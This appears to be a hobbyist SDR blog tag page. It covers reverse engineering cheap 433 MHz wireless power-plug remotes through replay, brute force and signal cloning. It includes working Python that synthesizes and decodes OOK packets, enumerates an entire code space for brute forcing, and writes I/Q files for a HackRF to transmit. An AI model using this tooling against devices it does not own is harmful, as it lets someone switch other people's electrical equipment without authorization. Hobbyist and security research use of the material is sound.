Tagged: on off keying

Reverse Engineering or Brute Forcing Wireless Powerplug Remote Controls with a HackRF One

Over on his blog "Foo-Manroot" has created a post where he shows how he can control a wirelessly controlled powerplug with his HackRF. These power plugs can be used to turn electrical devices on or off remotely, and their wireless protocol is often simple On-Off Keying (OOK) with little to no security.

Foo-Manroot first explains how to capture and replay a signal with the HackRF. If the protocol has no protection such as rolling codes, a simple replay attack like this is enough to control the device. In the next section he explains how to analyze and synthesize the packets yourself using Python and GNU Radio. Finally he shows that once you can synthesize the signal, a brute force attack becomes possible: the transmitter steps through every possible packet, and because the code space of a simple remote control protocol is small, this completes in a short time. His post also includes all the GNU Radio files required, so it is easy to replicate his work.
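As an added example (not code from Foo-Manroot's post or his GNU Radio files), the Python below does the three steps the post describes in miniature: it synthesizes a PWM-style OOK packet as a 0/1 baseband envelope, recovers the bits from such an envelope by measuring pulse widths (the same analysis step the OOK-Decoder tool mentioned further down this page performs on a real capture), and enumerates the whole code space for a brute-force run with an exact on-air time estimate. The symbol timings, the short-high/long-low encoding and the 12-bit code length are assumptions chosen to resemble common cheap 433.92 MHz outlet remotes; they must be replaced with values measured from your own capture before the output means anything for a real device.

```python
import itertools
import struct

# Assumed PWM symbol timings in microseconds. These resemble cheap
# PT2262-style 433.92 MHz outlet remotes but are NOT taken from the post;
# measure them from your own capture and replace them.
SHORT_US = 350
LONG_US = 1050
SYNC_LOW_US = 11000


def pulse(high_us, low_us, sample_rate):
    """One high/low pulse pair as a 0/1 envelope at the given sample rate."""
    high_n = round(high_us * sample_rate / 1_000_000)
    low_n = round(low_us * sample_rate / 1_000_000)
    return b"\x01" * high_n + b"\x00" * low_n


def encode_packet(bits, sample_rate=1_000_000, repeats=1):
    """Synthesize the OOK envelope for a bit string.

    Encoding (assumed): '0' = short high + long low, '1' = long high + short
    low; each repeat is terminated by a short high and a long sync gap.
    """
    out = bytearray()
    for _ in range(repeats):
        for b in bits:
            if b == "0":
                out += pulse(SHORT_US, LONG_US, sample_rate)
            elif b == "1":
                out += pulse(LONG_US, SHORT_US, sample_rate)
            else:
                raise ValueError(f"bit string must contain only 0/1, got {b!r}")
        out += pulse(SHORT_US, SYNC_LOW_US, sample_rate)
    return out


def decode_packet(samples, sample_rate=1_000_000):
    """Recover bit strings from a 0/1 envelope by measuring pulse widths.

    A real capture would first be thresholded into a 0/1 envelope; this
    function only does the pulse-width classification.
    """
    runs = [(level, sum(1 for _ in grp)) for level, grp in itertools.groupby(samples)]
    packets, bits = [], ""
    i = 1 if runs and runs[0][0] == 0 else 0  # skip leading silence
    while i + 1 < len(runs):
        (high_level, high_n), (low_level, low_n) = runs[i], runs[i + 1]
        if high_level != 1 or low_level != 0:
            raise ValueError("envelope is not alternating high/low runs")
        high_us = high_n * 1_000_000 / sample_rate
        low_us = low_n * 1_000_000 / sample_rate
        if low_us > SYNC_LOW_US / 2:  # a long gap closes the packet
            if bits:
                packets.append(bits)
                bits = ""
        else:
            bits += "0" if high_us < low_us else "1"
        i += 2
    if bits:  # capture ended before the sync gap
        packets.append(bits)
    return packets


def brute_force_space(nbits, sample_rate=1_000_000, repeats=1):
    """Yield (code, envelope) for every nbits-bit code, in ascending order."""
    for n in range(2 ** nbits):
        code = format(n, f"0{nbits}b")
        yield code, encode_packet(code, sample_rate, repeats)


def airtime_seconds(nbits, sample_rate=1_000_000, repeats=1):
    """Total on-air time needed to transmit every nbits-bit code once.

    Both symbols occupy SHORT_US + LONG_US, so every packet has the same
    length and one packet's duration times 2**nbits is exact.
    """
    per_packet = len(encode_packet("0" * nbits, sample_rate, repeats)) / sample_rate
    return per_packet * 2 ** nbits


def to_complex64(samples):
    """Convert a 0/1 envelope to interleaved little-endian float32 I/Q bytes
    (GNU Radio's complex file format) so a File Source block can feed it to a
    HackRF sink. Q is zero; the envelope keys the carrier through I."""
    return b"".join(struct.pack("<ff", float(s), 0.0) for s in samples)


if __name__ == "__main__":
    code = "101100111000"  # constructed example code, not from a real remote
    env = encode_packet(code, repeats=3)
    print("decoded:", decode_packet(env))
    print(f"brute forcing {2 ** len(code)} codes takes ~{airtime_seconds(len(code)):.1f} s")
    with open("packet.cfile", "wb") as f:
        f.write(to_complex64(env))
```

The round trip encode -> decode is the check to run against your own capture first: threshold the recorded magnitude into 0/1, confirm decode_packet returns the same bits every time you press the remote button, and only then generate the code space. With the assumed timings a 12-bit code space is 4096 packets of about 28 ms each, under two minutes of airtime, which is why the post's brute force is practical against remotes with no rolling code.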

If you are interested in controlling simple OOK devices like a wireless powerplug with replay attacks, we have a tutorial for doing this with a simple RTL-SDR and a Raspberry Pi running RpiTX, which may be useful for those who don't have a HackRF.

HackRF Controlling the Wireless Power Outlet by Brute Forcing Packets

Reverse Engineering Wireless Wall Outlets And Automatically Cloning OOK Signals

Wireless wall outlets are electrical outlets that can be turned on or off by a wireless remote. Fabien is an experimenter who was looking for a way to control the power of his home devices from a remote location using HTTP. He thought of building his own from scratch, but quickly realized that the device would need to be certified for insurance purposes. Instead he bought a cheap commercially made certified wireless wall outlet and reverse engineered the protocol using an RTL-SDR.

To do that he used the existing OOK-Decoder software available on GitHub. From the analysis provided by OOK-Decoder, Fabien was able to reimplement the transmission using an AVR microcontroller and a 433 MHz transceiver circuit from Sparkfun.

After being successful with this, Fabien decided to take the project a step further and create the OOKLONE – a device that could automatically clone any 433.92 MHz OOK signal and replay it. The video below shows the OOKLONE in action.